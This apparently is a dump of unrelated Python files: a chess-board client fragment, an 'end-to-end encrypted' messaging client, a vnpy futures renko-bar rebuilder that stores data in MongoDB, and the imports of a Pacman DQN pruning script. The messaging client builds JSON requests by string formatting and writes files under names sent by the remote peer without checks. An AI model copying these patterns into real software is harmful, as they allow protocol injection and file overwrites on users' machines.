            data, addr = self.recvfrom()
            print('Received', data, 'from', addr)
            # renamed from `type` to avoid shadowing the builtin
            cmd, param = parse_cmd(data)
            if cmd == 'board_size':
                print(cmd, param)
                self.chess_board.set_size(param)
            elif cmd == 'board':
                print(cmd, param)
                self.chess_board.set_positions(param)
            elif cmd == 'result':
                self.chess_board.set_score(param)
|
m_client.py | '''
## MESSAGING CLIENT 1.0
##
## This is a simple client side app that connects to the messaging server and provides End to End Encryption
## All messages transferred between clients are indecipherable to all except the communicating parties
## Users can register for accounts with the chosen server.
## You can also transfer files which will also be encrypted during transit.
## To transfer files, in the "Enter message: " prompt type "file: (filename)" without quotes,
## ...File must be within the same folder as this file (m_client.py) in order for it to work.
##
## Messages use a json based api
##
## IMPORTANT: If you wish to have multiple accounts, you must create a separate folder for
## each user, each containing the m_client.py and encryption_engine.py files.
## ...DO NOT login to another account from the wrong account folder.
## ...This is because of how the encryption keys are stored
##
## Author: Shimpano Mutangama
'''
import socket
import threading
import json
import sqlite3
import time
import sys
from encryption_engine import EncryptionEngine
import getpass
from io import BytesIO
class Client(object):
    """Python 2 end-to-end-encrypted messaging client.

    Talks JSON over a single TCP socket to the messaging server.  Requests are
    terminated by the sentinel string "/0"; file payloads by "/0end".  Shared
    symmetric keys and message history live in a local SQLite database
    ("local.db"); all cryptography is delegated to EncryptionEngine.
    NOTE(review): JSON requests are built with %-formatting, so user input
    containing quotes can break the protocol — server-side validation assumed.
    """

    def __init__(self,host,port):
        # Runs the whole interactive session: prepare storage/keys, show the
        # login menu (blocks until login succeeds), start the receive thread,
        # then enter the user menu loop.
        self._logged_user = None            # username after successful login
        self._remote_user_key = None        # mailbox for _fetch_remote_public_key (0 = server said "no such user")
        self._logged_user_api_key = None    # session token returned by the server on login
        self._server_tuple = (host,port)
        self.client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self._encryption_engine = EncryptionEngine()
        self._prepare_app()
        self._main_option_menu()
        self._initialize_waiting_thread()
        self._user_option_menu()

    def _poll_server_connection(self,server_tuple):
        """Block until a TCP connection to the server succeeds."""
        #Keep trying to connect every 5 seconds until server is found and online
        while True:
            try:
                self.client_socket.connect(server_tuple)
                break
            except:
                # NOTE(review): bare except also hides non-network errors.
                time.sleep(5)

    def _prepare_app(self):
        """Create the local SQLite schema and the device key pair (first run only)."""
        #This generates the public and private keys and creates the local database
        #in SQLite
        conn = sqlite3.connect("local.db")
        cursor = conn.cursor()
        #Create Tables if none exist
        user_key_table_sql = "CREATE TABLE IF NOT EXISTS userkeys (id INTEGER PRIMARY KEY NOT NULL,username varchar(200),prikey varchar(2000),pubkey varchar(2000))"
        shared_key_table_sql = "CREATE TABLE IF NOT EXISTS sharedkeys (id INTEGER PRIMARY KEY NOT NULL,username varchar(200),symkey varchar(2000))"
        message_table_sql = "CREATE TABLE IF NOT EXISTS messages (id INTEGER PRIMARY KEY NOT NULL, message varchar(200), sender varchar(200), receipient varchar(200), date varchar(200))"
        cursor.execute(shared_key_table_sql)
        cursor.execute(message_table_sql)
        cursor.execute(user_key_table_sql)
        #Check if you have generated your private keys
        check_keys_sql = 'SELECT pubkey,prikey FROM userkeys WHERE username=?'
        record = conn.execute(check_keys_sql,("device",))
        keys = record.fetchone()
        if keys is not None:
            pass
        else:
            # First run on this machine: generate the RSA-style key pair.
            self._encryption_engine.generate_private_public_key()
        print "Done preparing app"
        conn.commit()
        conn.close()

    def _main_option_menu_header(self):
        """Print the pre-login (register/login) menu banner."""
        print ""
        print "********* MESSAGING SERVICE *********"
        print "1. Register a User "
        print "2. Login a User "
        print ""

    def _main_option_menu(self):
        """Register/login loop; returns only once a login has succeeded."""
        self._main_option_menu_header()
        while True:
            print "> ",
            menu_choice = raw_input("")
            if menu_choice == "1":
                # Registration: send username/password plus our public key.
                print""
                username = raw_input("Choose a Username: ")
                password = getpass.getpass("Choose a Password: ")
                print "Connecting to Server"
                self._poll_server_connection(self._server_tuple)
                public_key = self._encryption_engine.fetch_public_key()
                request_json = '{"username":"%s","password":"%s","public_key":"%s","type":"registration"}'%(username,password,public_key)
                self.client_socket.sendall(request_json)
            elif menu_choice == "2":
                # Login: on success the server returns an api_key for the session.
                print""
                username = raw_input("Enter username: ")
                password = getpass.getpass("Enter password: ")
                print "Connecting to Server"
                self._poll_server_connection(self._server_tuple)
                request_json = '{"username":"%s","password":"%s","type":"login"}'%(username,password)
                self.client_socket.sendall(request_json)
                response = self.client_socket.recv(1024)
                response_json = json.loads(response)
                if response_json["success"] == True:
                    self._logged_user = username
                    self._logged_user_api_key = response_json["api_key"]
                    break
                else:
                    # Failed login: replace the (now consumed) socket and retry.
                    self.client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                    print""
                    print response_json["reason"]
                    print""

    def _initialize_waiting_thread(self):
        """Start the background daemon thread that receives server traffic."""
        #This thread waits to receive messages from the server and other users
        t = threading.Thread(target = self._wait_for_messages)
        t.daemon = True
        t.start()

    def _wait_for_messages(self):
        """Receive loop: accumulate chunks until the "/0" sentinel, then dispatch."""
        try:
            while True:
                chunk = self.client_socket.recv(1024)
                response = ''
                while chunk:
                    # "/0" marks the end of one JSON request/response frame.
                    if chunk[-2:] == "/0":
                        response+=chunk[:-2]
                        break
                    response+= chunk
                    chunk = self.client_socket.recv(1024)
                print"Response is: %s"%response
                self._handle_message_response(response)
        except:
            # Socket closed or fatal error: the daemon thread simply exits.
            print"Shutting down.."

    def _handle_message_response(self,response):
        """Dispatch one server frame by its JSON "type" field.

        Handles: message, file, unread, alert, publickey, sharedkey.
        Non-JSON frames fall into the except branch ('sent' acknowledgement).
        """
        try:
            json_data = json.loads(response)
            if json_data["type"] == "message":
                #Handles when user receives a message
                sender = json_data["sender"]
                date = json_data["date"]
                message = json_data["message"]
                receipient = json_data["receipient"]
                shared_key = self._encryption_engine.fetch_local_shared_key(sender)
                decrypted_text = self._encryption_engine.decrypt_text(message,shared_key)
                print"\nMessage Received"
                print""
                print"From: %s"%sender
                print"Date: %s"%date
                print"Message: %s"%decrypted_text
                print""
                # Persist the decrypted message locally.
                conn = sqlite3.connect('local.db')
                cursor = conn.cursor()
                cursor.execute('INSERT INTO messages (message,sender,receipient,date) VALUES (?,?,?,?)',(decrypted_text,sender,receipient,date))
                conn.commit()
                conn.close()
            elif json_data["type"] == "file":
                #Handles receiving of a file, after receiving a filename
                sender = json_data["sender"]
                shared_key = self._encryption_engine.fetch_local_shared_key(sender)
                filename = self._encryption_engine.decrypt_text(json_data["message"],shared_key)
                print "Receiving %s from %s, please wait...."%(filename,sender)
                #Prevent recv from taking too long
                self.client_socket.settimeout(5)
                try:
                    with open(filename,"wb") as f:
                        chunk = self.client_socket.recv(1024)
                        data = ''
                        if chunk == "/0end":
                            # Empty file: nothing to decrypt or write.
                            pass
                        else:
                            # Accumulate until the "/0end" sentinel, then decrypt once.
                            while chunk:
                                if chunk[-5:] == '/0end':
                                    data+=chunk[:-5]
                                    break
                                data+=chunk
                                chunk = self.client_socket.recv(1024)
                            decrypted_data = self._encryption_engine.decrypt_file(data,shared_key)
                            f.write(decrypted_data)
                except:
                    # Best-effort: timeout or decryption failure leaves a partial/empty file.
                    pass
                self.client_socket.settimeout(None)
                print "File Received"
            elif json_data["type"] == "unread":
                # Batch of messages queued while we were offline.
                unread_messages = json_data["objects"]
                for message in unread_messages:
                    sender = message["sender"]
                    date = message["date"]
                    message_text = message["message"]
                    receipient = message["receipient"]
                    shared_key = self._encryption_engine.fetch_local_shared_key(sender)
                    decrypted_text = self._encryption_engine.decrypt_text(message_text,shared_key)
                    print""
                    print"From: %s"%sender
                    print"Date: %s"%date
                    print"Message: %s"%decrypted_text
                    print""
                    conn = sqlite3.connect('local.db')
                    cursor = conn.cursor()
                    cursor.execute('INSERT INTO messages (message,sender,receipient,date) VALUES (?,?,?,?)',(decrypted_text,sender,receipient,date))
                    conn.commit()
                    conn.close()
            elif json_data["type"] == "alert":
                #Handles alerts like success and fails
                message = json_data["message"]
                #This helps throw an exception if encryption is tried
                #on a non existent key
                if json_data["success"] == False:
                    self._remote_user_key = 0
                print""
                print"Alert: %s"%message
                print""
            elif json_data["type"] == "publickey":
                #Handles response when you fetch a public key remotely
                username = json_data["username"]
                public_key = json_data["public_key"]
                print""
                print"Public Key for %s: %s"%(username,public_key)
                print""
                # Hand the key to the waiting _fetch_remote_public_key poll loop.
                self._remote_user_key = public_key
            elif json_data["type"] == "sharedkey":
                #Handle when a user sends you a shared key
                #Receives key and saves it to the database
                message = json_data["message"]
                sender = json_data["sender"]
                private_key = self._encryption_engine.fetch_private_key()
                decrypted_shared_key = self._encryption_engine.decrypt_key(message,private_key)
                self._encryption_engine.save_shared_key(sender,decrypted_shared_key)
                print""
            # Redraw the menu prompt after handling any frame.
            self._user_option_menu_header()
        except:
            # Non-JSON frames: the server's plain 'sent' acknowledgement, or a
            # genuinely malformed frame (re-raised).
            if response == 'sent':
                print""
                print"Success"
                print""
            else:
                print""
                print"Failed"
                print""
                raise
            self._user_option_menu_header()

    def _user_option_menu_header(self):
        """Print the post-login action menu and prompt."""
        print ""
        print "1. Send Message "
        print "2. View Conversation "
        print "3. View Inbox "
        print "4. View Outbox "
        print "5. View Unread "
        print "6. Exit "
        print ""
        print "> ",

    def _user_option_menu(self):
        """Main interactive loop after login; option 6 exits the process."""
        self._user_option_menu_header()
        while True:
            menu_option = raw_input("")
            if menu_option == "1":
                self._send_message_method()
            elif menu_option == "2":
                self._view_conversation_method()
            elif menu_option == "3":
                self._view_inbox_method()
            elif menu_option == "4":
                self._view_outbox_method()
            elif menu_option == "5":
                self._view_unread_method()
            elif menu_option == "6":
                sys.exit(0)

    def _fetch_remote_public_key(self,user):
        """Request `user`'s public key from the server and wait for the reply.

        The receive thread deposits the key into self._remote_user_key; a value
        of 0 means the server reported failure, in which case None is returned.
        """
        json_request = '{"username":"%s","logged_user":"%s","api_key":"%s","type":"publickey"}'%(user,self._logged_user,self._logged_user_api_key)
        self.client_socket.sendall(json_request)
        self.client_socket.send("/0")
        # NOTE(review): timeout/count are unused — the poll loop below can spin
        # forever if the server never answers.
        timeout = 5
        count = 0
        while self._remote_user_key is None:
            #Check every second if the remote key was fetched
            time.sleep(1)
            #If server responds with code 0 (from the receiving thread) set key to None
            #The try catch will throw an exception an fail gracefully
            if self._remote_user_key == 0:
                self._remote_user_key = None
                break
        remote_key = self._remote_user_key
        self._remote_user_key = None
        return remote_key

    def _send_message_method(self):
        """Prompt for a message (or "file: <name>") and send it encrypted.

        Establishes a shared symmetric key with the recipient first if none is
        stored locally (key exchange via the recipient's public key).
        """
        IS_FILE = False
        print ""
        message = raw_input("Enter message: ")
        receipient = raw_input("Enter recipient: ")
        print ""
        if message[:6] == "file: ":
            # "file: <name>" switches to file-transfer mode.
            IS_FILE = True
            message_list = message.split("file: ")
            message = message_list[1]
            filename = message
        sender = self._logged_user
        shared_key = self._encryption_engine.fetch_local_shared_key(receipient)
        try:
            if shared_key is not None:
                #The user has a shared key stored for recipient, so head straight to encryption
                encrypted_text = self._encryption_engine.encrypt_text(message,shared_key)
            else:
                #The user has no shared key stored for the recipient,
                #so generate and send them a shared key
                #fetch remote public key
                public_key = self._fetch_remote_public_key(receipient)
                #print "Public key fetched"
                #generate shared key
                shared_key = self._encryption_engine.generate_shared_key()
                #print "Shared key generated"
                #encrypt shared key with public key
                encrypted_shared_key = self._encryption_engine.encrypt_key(shared_key,public_key)
                #print"Shared key encrypted"
                #save shared key and username to database
                self._encryption_engine.save_shared_key(receipient,shared_key)
                #print "Shared key saved"
                #send to receipient
                request_json = '{"sender":"%s","receipient":"%s","logged_user":"%s","message":"%s","api_key":"%s","type":"sharedkey"}'%(sender,receipient,sender,encrypted_shared_key,self._logged_user_api_key)
                self.client_socket.sendall(request_json)
                self.client_socket.send("/0")
                #This wait is just so the recipient of the message can do all necessary calculations and store the key
                time.sleep(5)
                encrypted_text = self._encryption_engine.encrypt_text(message,shared_key)
            #Finally send the (encrypted) message
            if IS_FILE == False:
                message_json = '{"message":"%s", "receipient":"%s", "sender":"%s", "logged_user":"%s", "api_key":"%s","type":"message"}'%(encrypted_text,receipient,sender,self._logged_user,self._logged_user_api_key)
                self.client_socket.sendall(message_json)
                self.client_socket.send("/0")
                # Store the plaintext copy locally with a send timestamp.
                current_time_epoch = time.time()
                time_format = '%Y/%m/%d %H:%M:%S'
                date = time.strftime(time_format,time.localtime(current_time_epoch))
                conn = sqlite3.connect('local.db')
                cursor = conn.cursor()
                cursor.execute('INSERT INTO messages (message,sender,receipient,date) VALUES (?,?,?,?)',(message,sender,receipient,date))
                conn.commit()
                conn.close()
            else:
                try:
                    with open(filename,"rb") as f:
                        print "Sending file to %s...."%receipient
                        # Announce the (encrypted) filename, then stream the
                        # encrypted file bytes terminated by "/0end".
                        message_json = '{"message":"%s", "receipient":"%s", "sender":"%s", "logged_user":"%s", "api_key":"%s","type":"file"}'%(encrypted_text,receipient,sender,self._logged_user,self._logged_user_api_key)
                        self.client_socket.sendall(message_json)
                        self.client_socket.send("/0")
                        data = f.read()
                        encrypted_data = self._encryption_engine.encrypt_file(data,shared_key)
                        self.client_socket.sendall(encrypted_data+"/0end")
                        print "Done!"
                except:
                    print "There was an error... Check that file exists"
                    self._user_option_menu_header()
                    pass
        except:
            #"There was an error!"
            # NOTE(review): silently swallows key-exchange/encryption failures.
            pass

    def _view_conversation_method(self):
        """Print the locally stored two-way conversation with another user."""
        print ""
        user1 = raw_input("View conversation with: ")
        print""
        user2 = self._logged_user
        conn = sqlite3.connect("local.db")
        cursor = conn.cursor()
        conversation_sql = 'SELECT message,sender,receipient,date FROM messages WHERE (sender=? AND receipient=?) OR (sender=? AND receipient=?)'
        messages = cursor.execute(conversation_sql,(user1,user2,user2,user1))
        for message in messages:
            print""
            print"From: %s"%message[1]
            print"To: %s"%message[2]
            print"Date: %s"%message[3]
            print"Message: %s"%message[0]
            print""
        self._user_option_menu_header()

    def _view_inbox_method(self):
        """Print all locally stored messages addressed to the logged-in user."""
        conn = sqlite3.connect("local.db")
        cursor = conn.cursor()
        receipient = self._logged_user
        view_received_messages_sql = 'SELECT message,sender,receipient,date FROM messages WHERE receipient=?'
        messages = cursor.execute(view_received_messages_sql,(receipient,))
        for message in messages:
            print""
            print"From: %s"%message[1]
            print"Date: %s"%message[3]
            print"Message: %s"%message[0]
            print""
        conn.close()
        self._user_option_menu_header()

    def _view_unread_method(self):
        """Ask the server for queued unread messages (printed by the receive thread)."""
        request = '{"logged_user":"%s","api_key":"%s","type":"unread"}'%(self._logged_user,self._logged_user_api_key)
        self.client_socket.sendall(request)
        self.client_socket.send("/0")

    def _view_outbox_method(self):
        """Print all locally stored messages sent by the logged-in user."""
        conn = sqlite3.connect("local.db")
        cursor = conn.cursor()
        sender = self._logged_user
        view_received_messages_sql = 'SELECT message,sender,receipient,date FROM messages WHERE sender=?'
        messages = cursor.execute(view_received_messages_sql,(sender,))
        for message in messages:
            print""
            print"To: %s"%message[2]
            print"Date: %s"%message[3]
            print"Message: %s"%message[0]
            print""
        conn.close()
        self._user_option_menu_header()
if __name__=="__main__":
    # Connect to the messaging server on the local machine.
    server_host = '127.0.0.1'
    server_port = 1000
    client = Client(server_host, server_port)
|
rebuild_future.py | # encoding: UTF-8
import os
import copy
import csv
import signal
import traceback
from datetime import datetime, timedelta
from queue import Queue
from time import sleep
from threading import Thread
from vnpy.data.mongo.mongo_data import MongoData
from vnpy.data.tdx.tdx_common import FakeStrategy, get_future_contracts
from vnpy.data.tdx.tdx_future_data import TdxFutureData
from vnpy.data.renko.config import HEIGHT_LIST, FUTURE_RENKO_DB_NAME
from vnpy.app.cta_strategy_pro.cta_renko_bar import CtaRenkoBar
from vnpy.trader.object import TickData, RenkoBarData, Exchange, Color
from vnpy.trader.utility import get_trading_date, get_underlying_symbol
class FutureRenkoRebuilder(FakeStrategy):
    """
    Rebuild renko bars for domestic (China) commodity futures index contracts.

    Ticks are downloaded from TDX, replayed through one CtaRenkoBar generator
    per requested brick height, and the resulting renko bars are persisted to
    MongoDB via on_bar_renko().
    """
    def __init__(self, setting: dict = {}):
        # NOTE(review): mutable default argument `{}` is shared across calls —
        # left as-is; safe only while callers never mutate it.
        self.tdx_api = None              # TdxFutureData connection, created in start()
        self.queue = Queue()             # (datetime, price, volume) ticks pending replay
        self.active = False              # run flag for the tick-consumer thread
        self.loaded = False              # True once all history has been queued
        self.thread = None               # tick-consumer thread
        self.symbol = None
        self.underlying_symbol = None
        self.price_tick = 1
        self.exchange = None
        self.renko_bars = {}  # bar_name: renko_bar
        self.setting = setting
        self.mongo_client = MongoData(host=self.setting.get('host', 'localhost'), port=self.setting.get('port', 27017))
        self.db_name = setting.get('db_name', FUTURE_RENKO_DB_NAME)
        self.last_close_dt_dict = {}     # bar_name -> close datetime of last stored bar
        self.future_contracts = get_future_contracts()
        self.cache_folder = setting.get('cache_folder', None)

    def get_last_bar(self, renko_name):
        """
        Fetch the most recent renko bar of a collection from Mongo.
        :param renko_name: collection name, e.g. 'RB99_10'
        :return: (bar, close datetime of that bar); (None, None) for an empty collection
        """
        qryData = self.mongo_client.db_query_by_sort(db_name=self.db_name,
                                                     col_name=renko_name,
                                                     filter_dict={},
                                                     sort_name='datetime',
                                                     sort_type=-1,
                                                     limitNum=1)
        last_renko_close_dt = None
        bar = None
        for d in qryData:
            bar = RenkoBarData(gateway_name='tdx', exchange=Exchange.LOCAL, datetime=None, symbol=self.symbol)
            d.pop('_id', None)
            bar.__dict__.update(d)
            bar.exchange = Exchange(d.get('exchange'))
            bar.color = Color(d.get('color'))
            last_renko_open_dt = d.get('datetime', None)
            if last_renko_open_dt is not None:
                # close time = open time + bar duration ('seconds' field)
                last_renko_close_dt = last_renko_open_dt + timedelta(seconds=d.get('seconds', 0))
            break
        return bar, last_renko_close_dt

    def start(self, symbol, price_tick, height, start_date='2016-01-01', end_date='2099-01-01', refill=False):
        """Start the rebuild job: create renko generators, download ticks, feed the queue."""
        self.underlying_symbol = get_underlying_symbol(symbol).upper()
        self.symbol = symbol.upper()
        self.price_tick = price_tick
        info = self.future_contracts.get(self.underlying_symbol, None)
        if info:
            self.exchange = Exchange(info.get('exchange'))
        else:
            self.exchange = Exchange.LOCAL
        if not isinstance(height, list):
            height = [height]
        db_last_close_dt = None
        for h in height:
            bar_name = '{}_{}'.format(self.symbol, h)
            bar_setting = {'name': bar_name,
                           'underlying_symbol': self.underlying_symbol,
                           'symbol': self.symbol,
                           'price_tick': price_tick}
            # 's' suffix on the height spec: enable tick smoothing
            if isinstance(h, str) and h.endswith('s'):
                h = h.replace('s', '')
                bar_setting.update({'activate_ma_tick': True})
                if 'K' not in h:
                    h = int(h)
            if isinstance(h, str) and 'K' in h:
                # 'K' suffix: height expressed as thousandths of price
                kilo_height = int(h.replace('K', ''))
                renko_height = price_tick * kilo_height
                self.write_log(u'使用价格千分比:{}'.format(h))
                bar_setting.update({'kilo_height': kilo_height})
            else:
                # plain number: absolute brick height in price ticks
                self.write_log(u'使用绝对砖块高度数:{}'.format(h))
                renko_height = price_tick * int(h)
                bar_setting.update({'height': renko_height})
            self.renko_bars[bar_name] = CtaRenkoBar(None, cb_on_bar=self.on_bar_renko, setting=bar_setting)
            if refill:
                bar, bar_last_close_dt = self.get_last_bar(bar_name)
                if bar:
                    self.write_log(u'重新添加最后一根{} Bar:{}'.format(bar_name, bar.__dict__))
                    # Re-add the bar only; do not fire the on_bar callback.
                    self.renko_bars[bar_name].add_bar(bar, is_init=True)
                    # Recompute the brick height from the last close price.
                    self.renko_bars[bar_name].update_renko_height(bar.close_price, renko_height)
                if bar_last_close_dt:
                    self.last_close_dt_dict.update({bar_name: bar_last_close_dt})
                    # Track the earliest stored close across all heights.
                    if db_last_close_dt:
                        db_last_close_dt = min(bar_last_close_dt, db_last_close_dt)
                    else:
                        db_last_close_dt = bar_last_close_dt
        # Start the tick-consumer thread.
        self.thread = Thread(target=self.run, daemon=True)
        self.active = True
        self.thread.start()
        self.check_index()
        # Open the TDX data connection.
        self.tdx_api = TdxFutureData(self)
        # Resolve the start~end download window.
        start_day = datetime.strptime(start_date, '%Y-%m-%d')
        if isinstance(db_last_close_dt, datetime):
            # Resume a little before the last stored bar to avoid gaps.
            if start_day < db_last_close_dt:
                start_day = db_last_close_dt - timedelta(days=3)
        end_day = datetime.strptime(end_date, '%Y-%m-%d')
        cur_trading_date = get_trading_date(datetime.now())
        if end_day >= datetime.now():
            # Clamp the end to the current trading day.
            end_day = datetime.strptime(cur_trading_date, '%Y-%m-%d') + timedelta(days=1)
            self.write_log(u'结束日期=》{}'.format(cur_trading_date))
        days = (end_day - start_day).days + 1
        self.write_log(u'数据范围:{}~{},{}天'.format(start_day.strftime('%Y-%m-%d'), end_day.strftime('%Y-%m-%d'), days))
        self.loaded = False
        last_tick_dt = None
        try:
            for i in range(days):
                trading_day = start_day + timedelta(days=i)
                self.write_log(u'获取{}分笔交易数据'.format(trading_day.strftime('%Y-%m-%d')))
                ret, result = self.tdx_api.get_history_transaction_data(self.symbol, trading_day.strftime('%Y%m%d'),
                                                                        self.cache_folder)
                if not ret:
                    self.write_error(u'取{} {}数据失败'.format(trading_day, self.symbol))
                    continue
                for data in result:
                    dt = data.get('datetime')
                    # Keep tick timestamps monotonically non-decreasing.
                    if last_tick_dt is None:
                        last_tick_dt = dt
                    if last_tick_dt > dt:
                        continue
                    last_tick_dt = dt
                    # Drop ticks older than what the DB already covers.
                    if db_last_close_dt:
                        if dt < db_last_close_dt:
                            continue
                    price = data.get('price')
                    volume = data.get('volume')
                    self.queue.put(item=(dt, price, volume))
                sleep(5)
        except Exception as ex:
            self.write_error(u'tdx下载数据异常:{}'.format(str(ex)))
            self.write_error(traceback.format_exc())
            self.tdx_api = None
        self.write_log(u'加载完毕')
        self.loaded = True
        # Wait for the consumer thread to drain the queue, then shut down.
        while self.active:
            sleep(1)
        self.exit()

    def run(self):
        """Tick consumer: pop queued ticks and feed every renko generator."""
        self.write_log(u'启动处理tick线程')
        while self.active:
            try:
                dt, price, volume = self.queue.get(timeout=1)
                tick = TickData(gateway_name='tdx', symbol=self.symbol, exchange=self.exchange, datetime=dt)
                tick.date = tick.datetime.strftime('%Y-%m-%d')
                tick.time = tick.datetime.strftime('%H:%M:%S')
                tick.trading_day = get_trading_date(tick.datetime)
                tick.last_price = float(price)
                tick.volume = int(volume)
                for bar_name, renko_bar in self.renko_bars.items():
                    last_dt = self.last_close_dt_dict.get(bar_name, None)
                    # Skip ticks already covered by bars stored in the DB.
                    if last_dt and tick.datetime < last_dt:
                        continue
                    # Skip the 8:xx / 20:xx pre-open auction hours.
                    if tick.datetime.hour in [8, 20]:
                        continue
                    if self.underlying_symbol in ['T', 'TF', 'TS', 'IF', 'IH', 'IC']:
                        # Financial futures only trade from 9:30.
                        if tick.datetime.hour == 9 and tick.datetime.minute < 30:
                            continue
                    renko_bar.on_tick(tick)
            except Exception as ex:
                # queue.get(timeout=1) raises Empty while idle; once loading is
                # finished and the queue drained, stop the worker.
                if self.queue.empty() and self.loaded:
                    self.active = False
                    self.write_log(u'队列清空完成')
                if str(ex) not in ['', 'Empty']:
                    self.write_error(traceback.format_exc())
        self.write_log(u'处理tick线程结束')

    def exit(self):
        """Finish up and terminate the process."""
        self.write_log(u'重建结束')
        if self.thread:
            self.thread.join()
        try:
            self.thread = None
            self.queue = None
        except Exception:
            pass
        # Hard-exit: kill our own process so lingering client threads cannot keep it alive.
        os.kill(os.getpid(), signal.SIGTERM)

    def on_bar_renko(self, bar, bar_name):
        """Callback on a completed renko bar: upsert it into Mongo."""
        flt = {'datetime': bar.datetime, 'open': bar.open_price, 'close': bar.close_price, 'volume': bar.volume}
        d = copy.copy(bar.__dict__)
        d.pop('row_data', None)
        # Convert fields: work around awkward attribute naming in vnpy 2.0 objects.
        d.update({'exchange': bar.exchange.value})
        d.update({'color': bar.color.value})
        d.update({'open': d.pop('open_price')})
        d.update({'close': d.pop('close_price')})
        d.update({'high': d.pop('high_price')})
        d.update({'low': d.pop('low_price')})
        try:
            self.mongo_client.db_update(self.db_name, bar_name, d, flt, True)
            self.write_log(u'new Renko Bar:{},dt:{},open:{},close:{},high:{},low:{},color:{}'
                           .format(bar_name, bar.datetime, bar.open_price, bar.close_price, bar.high_price,
                                   bar.low_price, bar.color.value))
        except Exception as ex:
            self.write_error(u'写入数据库异常:{},bar:{}'.format(str(ex), d))

    def update_last_dt(self, symbol, height):
        """Write the latest bar time into the main-contract settings collection."""
        # Only index contracts (symbol ending in '99') are tracked.
        if not symbol.endswith('99'):
            return
        bar, last_dt = self.get_last_bar('_'.join([symbol, str(height)]))
        if not last_dt:
            return
        flt = {'short_symbol': symbol.replace('99', '')}
        d = {'renko_{}'.format(height): last_dt.strftime('%Y-%m-%d %H:%M:%S') if isinstance(last_dt,
                                                                                            datetime) else last_dt}
        self.write_log(u'更新主力合约表中:{}的renko bar {}_{}最后时间:{}'.format(symbol.replace('99', ''), symbol, height, d))
        self.mongo_client.db_update(db_name='Contract', col_name='mi_symbols', filter_dict=flt, data_dict=d,
                                    upsert=False,
                                    replace=False)

    def check_index(self):
        """Ensure indexes exist for every active renko collection, creating them if missing."""
        for col_name in self.renko_bars.keys():
            self.write_log(u'检查{}.{}索引'.format(self.db_name, col_name))
            self.mongo_client.db_create_index(dbName=self.db_name, collectionName=col_name, indexName='datetime',
                                              sortType=1)
            self.mongo_client.db_create_multi_index(db_name=self.db_name, col_name=col_name,
                                                    index_list=[('datetime', 1), ('open', 1), ('close', 1),
                                                                ('volume', 1)])
            symbol, height = col_name.split('_')
            self.write_log(u'更新{}最后日期'.format(col_name))
            self.update_last_dt(symbol, height)

    def check_all_index(self):
        """Check indexes for every known contract and every configured brick height."""
        contracts = self.mongo_client.db_query(db_name='Contract', col_name='mi_symbols', filter_dict={},
                                               sort_key='short_symbol')
        for contract in contracts:
            short_symbol = contract.get('short_symbol')
            for height in HEIGHT_LIST:
                col_name = '{}99_{}'.format(short_symbol, height)
                self.write_log(u'检查{}.{}索引'.format(self.db_name, col_name))
                self.mongo_client.db_create_index(dbName=self.db_name, collectionName=col_name, indexName='datetime',
                                                  sortType=1)
                self.mongo_client.db_create_multi_index(db_name=self.db_name, col_name=col_name,
                                                        index_list=[('datetime', 1), ('open', 1), ('close', 1),
                                                                    ('volume', 1)])
                symbol, height = col_name.split('_')
                self.write_log(u'更新{}最后日期'.format(col_name))
                self.update_last_dt(symbol, height)

    def export(self, symbol, height=10, start_date='2016-01-01', end_date='2099-01-01', csv_file=None):
        """Export one renko collection to a CSV file."""
        qry = {'tradingDay': {'$gt': start_date, '$lt': end_date}}
        results = self.mongo_client.db_query_by_sort(db_name=self.db_name, col_name='_'.join([symbol, str(height)]),
                                                     filter_dict=qry, sort_name='$natural', sort_type=1)
        if len(results) > 0:
            self.write_log(u'获取数据:{}条'.format(len(results)))
            header = None
            if csv_file is None:
                csv_file = 'future_renko_{}_{}_{}_{}.csv'.format(symbol, height, start_date.replace('-', ''),
                                                                 end_date.replace('-', ''))
            f = open(csv_file, 'w', encoding=u'utf-8', newline="")
            dw = None
            for data in results:
                data.pop('_id', None)
                data['index'] = data.pop('datetime', None)
                data['trading_date'] = data.pop('trading_day', None)
                # Exclude bars produced during the opening call auction.
                bar_start_dt = data.get('index')
                if bar_start_dt is None or not isinstance(bar_start_dt, datetime):
                    continue
                bar_end_dt = bar_start_dt + timedelta(seconds=int(data.get('seconds', 0)))
                if bar_start_dt.hour in [8, 20] and bar_end_dt.hour in [8, 20]:
                    continue
                if header is None and dw is None:
                    # Build the CSV header lazily from the first exportable row,
                    # keeping 'index' as the first column.
                    header = sorted(data.keys())
                    header.remove('index')
                    header.insert(0, 'index')
                    dw = csv.DictWriter(f, fieldnames=header, dialect='excel', extrasaction='ignore')
                    dw.writeheader()
                if dw:
                    dw.writerow(data)
            f.close()
            self.write_log(u'导出成功,文件:{}'.format(csv_file))
        else:
            self.write_error(u'导出失败')

    def export_refill_scripts(self):
        """Print a refill command line for every known main contract."""
        contracts = self.mongo_client.db_query(db_name='Contract', col_name='mi_symbols', filter_dict={},
                                               sort_key='short_symbol')
        for contract in contracts:
            short_symbol = contract.get('short_symbol')
            min_diff = contract.get('priceTick')
            command = 'python refill_renko.py {} {}99 {}'.format(self.setting.get('host', 'localhost'),
                                                                 short_symbol.upper(), min_diff)
            self.write_log(command)

    def export_all(self, start_date='2016-01-01', end_date='2099-01-01', csv_folder=None):
        """Export every contract's renko collections (all heights) to CSV files."""
        contracts = self.mongo_client.db_query(db_name='Contract', col_name='mi_symbols', filter_dict={},
                                               sort_key='short_symbol')
        for contract in contracts:
            short_symbol = contract.get('short_symbol')
            symbol = '{}99'.format(short_symbol)
            self.write_log(u'导出:{}合约'.format(short_symbol))
            for height in HEIGHT_LIST:
                if csv_folder:
                    csv_file = os.path.abspath(os.path.join(csv_folder, 'future_renko_{}_{}_{}_{}.csv'
                                                            .format(symbol, height, start_date.replace('-', ''),
                                                                    end_date.replace('-', ''))))
                else:
                    csv_file = None
                self.export(symbol, height, start_date, end_date, csv_file)
|
prune.py | import gym
from model import DQNPacman, PacmanTargetNet, StudentPacman
from configs import DensePacmanAgentConfig as dense_config
from configs import PrunePacmanAgentConfig as prune_config
from configs import StudentPacmanConfig as student_config
from Pacman.evaluate import evaluate
from utils.Memory import ExperienceReplayMultistep, MultiStepPrioritizedExperienceReplay, Supervised_ExperienceReplay,\
Supervised_Prioritzed_ExperienceReplay
import numpy as np
from Pacman.train import train_on_batch, train_on_batch_with_benchmark
from utils.plot_utils import plot_graph, plot_nnz_vs_accuracy
from utils.logger_utils import get_logger
from multiprocessing import Process, Queue
from Pacman.processor import process_observation, process_state_batch, init_state, append_frame
